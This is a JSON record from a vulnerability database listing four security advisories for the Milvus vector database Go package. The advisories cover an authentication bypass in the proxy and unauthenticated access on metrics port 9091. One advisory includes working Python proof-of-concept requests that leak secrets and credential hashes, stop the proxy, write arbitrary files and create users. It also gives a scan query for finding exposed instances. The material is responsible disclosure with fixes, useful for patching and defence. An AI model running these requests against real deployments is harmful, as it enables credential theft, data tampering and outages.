{"ecosystem":"go","package":"github.com/milvus-io/milvus","version":null,"bugs":[{"id":5220,"ecosystem":"go","package_name":"github.com/milvus-io/milvus","affected_version":null,"fixed_version":null,"bug_id":"osv:GO-2026-4481","title":"Milvus: Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise in github.com/milvus-io/milvus","description":"Milvus: Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise in github.com/milvus-io/milvus.\n\nNOTE: The source advisory for this report contains additional versions that could not be automatically mapped to standard Go module versions.\n\n(If this is causing false-positive reports from vulnerability scanners, please suggest an edit to the report.)\n\nThe additional affected modules and versions are: github.com/milvus-io/milvus before v2.5.27, from v2.6.0 before v2.6.10.","severity":"medium","status":"open","source":"osv","source_url":"https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6","labels":["BIT-milvus-2026-26190","CVE-2026-26190","GHSA-7ppg-37fh-vcr6"],"created_at":"2026-04-26 03:01:56.826683+00:00","updated_at":"2026-04-26 03:01:56.826683+00:00"},{"id":5219,"ecosystem":"go","package_name":"github.com/milvus-io/milvus","affected_version":"0.10.4","fixed_version":"0.10.3-0.20251107071934-6102f001a971","bug_id":"osv:GO-2025-4114","title":"Milvus Proxy has a Critical Authentication Bypass Vulnerability in github.com/milvus-io/milvus","description":"Milvus Proxy has a Critical Authentication Bypass Vulnerability in github.com/milvus-io/milvus.\n\nNOTE: The source advisory for this report contains additional versions that could not be automatically mapped to standard Go module versions.\n\n(If this is causing false-positive reports from vulnerability scanners, please suggest an edit to the report.)\n\nThe additional affected modules and versions are: github.com/milvus-io/milvus before v2.4.24, from v2.5.0 before v2.5.21, from v2.6.0 before v2.6.5.","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/milvus-io/milvus/security/advisories/GHSA-mhjq-8c7m-3f7p","labels":["BIT-milvus-2025-64513","CVE-2025-64513","GHSA-mhjq-8c7m-3f7p"],"created_at":"2026-04-26 03:01:56.823964+00:00","updated_at":"2026-04-26 03:01:56.823964+00:00"},{"id":5218,"ecosystem":"go","package_name":"github.com/milvus-io/milvus","affected_version":"0.10.4","fixed_version":"2.4.24","bug_id":"osv:GHSA-mhjq-8c7m-3f7p","title":"Milvus Proxy has a Critical Authentication Bypass Vulnerability","description":"### Impact\n_What kind of vulnerability is it? Who is impacted?_\nAn unauthenticated attacker can exploit this vulnerability to bypass all authentication mechanisms in the Milvus Proxy component, gaining full administrative access to the Milvus cluster.\nThis grants the attacker the ability to read, modify, or delete data, and to perform privileged administrative operations such as database or collection management.\nAll users running affected Milvus versions are strongly advised to upgrade immediately.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\nThis issue has been fixed in the following versions:\n\t•\tMilvus 2.4.24\n\t•\tMilvus 2.5.21\n\t•\tMilvus 2.6.5\n\nUsers should upgrade to these patched versions or later to mitigate the vulnerability.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\nIf immediate upgrade is not possible, a temporary mitigation can be applied by removing the sourceID header from all incoming requests at the gateway, API gateway, or load balancer level before they reach the Milvus Proxy.\nThis prevents attackers from exploiting the authentication bypass behavior.\n\n### References\n_Are there any links users can visit to find out more?_\n\nThe following pull requests contain the fixes for the affected Milvus branches:\n\t•\t[Fix for 2.4 branch](https://github.com/milvus-io/milvus/pull/45391)\n\t•\t[Fix for 2.5 branch](https://github.com/milvus-io/milvus/pull/45383)\n\t•\t[Fix for 2.6 branch](https://github.com/milvus-io/milvus/pull/45379)\n\nSpecial thanks to the Volcengine Milvus team at ByteDance(liumingzhe.5689@bytedance.com) for responsibly discovering, reporting, and coordinating the disclosure of this critical authentication bypass vulnerability with the Milvus maintainers.","severity":"critical","status":"fixed","source":"osv","source_url":"https://github.com/milvus-io/milvus/security/advisories/GHSA-mhjq-8c7m-3f7p","labels":["BIT-milvus-2025-64513","CVE-2025-64513","GO-2025-4114"],"created_at":"2026-04-26 03:01:56.821232+00:00","updated_at":"2026-04-26 03:01:56.821232+00:00"},{"id":5217,"ecosystem":"go","package_name":"github.com/milvus-io/milvus","affected_version":null,"fixed_version":"2.5.27","bug_id":"osv:GHSA-7ppg-37fh-vcr6","title":"Milvus: Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise","description":"## Summary\n\nMilvus exposes TCP port 9091 by default with two critical authentication bypass vulnerabilities:\n\n1. The `/expr` debug endpoint uses a weak, predictable default authentication token derived from `etcd.rootPath` (default: `by-dev`), enabling arbitrary expression evaluation.\n2. The full REST API (`/api/v1/*`) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management.\n\n## Details\n\n### Vulnerability 1: Weak Default Authentication on `/expr` Endpoint\n\nThe `/expr` endpoint on port 9091 accepts an `auth` parameter that defaults to the `etcd.rootPath` value (`by-dev`). This value is well-known and predictable. An attacker who can reach port 9091 can evaluate arbitrary internal Go expressions, leading to:\n\n- **Information/Credential Disclosure**: Reading internal configuration values (MinIO secrets, etcd credentials) and user credential hashes via `param.MinioCfg.SecretAccessKey.GetValue()`, `rootcoord.meta.GetCredential(ctx, 'root')`, etc.\n- **Denial of Service**: Invoking `proxy.Stop()` to shut down the proxy service.\n- **Arbitrary File Write (potential RCE)**: Manipulating access log configuration parameters to write arbitrary content to arbitrary file paths on the server filesystem.\n\n### Vulnerability 2: Unauthenticated REST API on Metrics Port\n\nBusiness-logic HTTP handlers (collection management, data insertion, credential management) are registered on the metrics/management HTTP server at port 9091 via `registerHTTPServer()` in [`internal/distributed/proxy/service.go` (line 170)](https://github.com/milvus-io/milvus/blob/9996e8d1cebff7e7108bcb16d43124236de77438/internal/distributed/proxy/service.go#L170). These endpoints do not enforce any authentication, even when Milvus authentication is enabled on the primary gRPC/HTTP ports.\n\nAn attacker can perform any business operation without credentials, including:\n\n- Creating, listing, and deleting collections\n- Inserting and querying data\n- Creating, listing, and deleting user credentials\n- Modifying user passwords\n\n## Proof of Concept\n\n### PoC 1 — `/expr` Endpoint Exploitation\n\n```python\nimport requests\n\nurl = \"http://<target>:9091/expr\"\n\n# Leak sensitive configuration (e.g., MinIO secret key)\nres = requests.get(url, params={\n    \"auth\": \"by-dev\",\n    \"code\": \"param.MinioCfg.SecretAccessKey.GetValue()\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Retrieve hashed credentials for the root user\nres = requests.get(url, params={\n    \"auth\": \"by-dev\",\n    \"code\": \"rootcoord.meta.GetCredential(ctx, 'root')\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Denial of Service — stop the proxy\nres = requests.get(url, params={\n    \"auth\": \"by-dev\",\n    \"code\": \"proxy.Stop()\"\n}, timeout=5)\n\n# Arbitrary file write (potential RCE)\nfor cmd in [\n    'param.Save(\"proxy.accessLog.localPath\", \"/tmp\")',\n    'param.Save(\"proxy.accessLog.formatters.base.format\", \"whoami\")',\n    'param.Save(\"proxy.accessLog.filename\", \"evil.sh\")',\n    'querycoord.etcdCli.KV.Put(ctx, \"by-dev/config/proxy/accessLog/enable\", \"true\")'\n]:\n    requests.get(url, params={\"auth\": \"by-dev\", \"code\": cmd}, timeout=5)\n```\n\n### PoC 2 — Unauthenticated REST API Access\n\n```python\nimport requests\n\ntarget_url = \"http://<target>:9091\"\n\n# Create a user without any authentication\nres = requests.post(f\"{target_url}/api/v1/credential\", json={\n    \"username\": \"attacker_user\",\n    \"password\": \"MTIzNDU2Nzg5\",\n})\nprint(res.json())\n\n# List all users\nres = requests.get(f\"{target_url}/api/v1/credential/users\")\nprint(res.json())  # {'status': {}, 'usernames': ['root', 'attacker_user']}\n\n# Create and delete collections, insert data — all without authentication\n```\n\n## Internet Exposure\n\nA significant number of publicly exposed Milvus instances are discoverable via internet-wide scanning using the pattern:\n\n```\nhttp.body=\"404 page not found\" && port=\"9091\"\n```\n\nThis indicates the vulnerability is actively exploitable in real-world production environments.\n\n## Impact\n\nAn unauthenticated remote attacker with network access to port 9091 can:\n\n1. **Exfiltrate secrets and credentials** — MinIO keys, etcd credentials, user password hashes, and all internal configuration values.\n2. **Manipulate all data** — Create, modify, and delete collections, insert or remove data, bypassing all application-level access controls.\n3. **Manage user accounts** — Create administrative users, reset passwords, and escalate privileges.\n4. **Cause denial of service** — Shut down proxy services, drop databases, or corrupt metadata.\n5. **Write arbitrary files** — Potentially achieve remote code execution by writing malicious files to the filesystem via access log configuration manipulation.\n\n## Remediation\n\n### Recommended Fixes\n\n1. **Remove or disable the `/expr` endpoint** in production builds. If retained for debugging, it must require strong, non-default authentication and be disabled by default.\n2. **Do not register business API routes on the metrics port.** Separate the metrics/health endpoints from the application REST API to ensure authentication middleware applies consistently.\n3. **Bind port 9091 to localhost by default** (`127.0.0.1:9091`) so it is not externally accessible unless explicitly configured.\n4. **Enforce authentication on all API endpoints**, regardless of which port they are served on.\n\n### User Mitigations (until patched)\n\n- Block external access to port 9091 using firewall rules or network policies.\n- If running in Docker/Kubernetes, do not expose port 9091 outside the internal network.\n- Change the `etcd.rootPath` from the default value `by-dev` to a strong, random value (partial mitigation only — does not address the unauthenticated REST API).\n\n## Credit\n\nThis vulnerability was discovered and responsibly reported by **YingLin Xie** (xieyinglin@hust.edu.cn). It was independently reported by [0x1f](https://github.com/0x1f) and zznQ ([ac0d3r](https://github.com/ac0d3r)).","severity":"critical","status":"fixed","source":"osv","source_url":"https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6","labels":["BIT-milvus-2026-26190","CVE-2026-26190","GO-2026-4481"],"created_at":"2026-04-26 03:01:56.818313+00:00","updated_at":"2026-04-26 03:01:56.818313+00:00"}],"total":4,"_cache":"hit"}